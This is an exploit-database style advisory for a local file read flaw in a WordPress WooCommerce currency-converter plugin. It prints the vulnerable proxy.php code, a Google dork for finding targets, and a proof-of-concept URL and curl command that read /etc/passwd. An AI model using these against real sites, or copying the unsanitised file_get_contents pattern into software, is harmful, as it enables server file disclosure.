Paypal Currency Converter Basic For Woocommerce File Read

vendor:

Paypal Currency Converter Basic For Woocommerce

by:

Kuroi'SH

7.5

CVSS

HIGH

File Read

CWE

Product Name: Paypal Currency Converter Basic For Woocommerce

Affected Version From: 1

Affected Version To: 1.3

Patch Exists: NO

Related CWE: N/A

CPE: a:wordpress:paypal_currency_converter_basic_for_woocommerce

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2015

Paypal Currency Converter Basic For Woocommerce File Read

Based on user input, the content of a file is printed out (unfortunately not included) so any html file can be loaded, and an attacker may be able to read any local file which is not executed in the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used to access files.

Source

Exploit-DB raw data:

# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link:
https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
 Description:
 proxy.php's code:
 <?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately
not included) so any html file can be loaded, and an attacker may be able
to read  any local file which
is not executed in the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd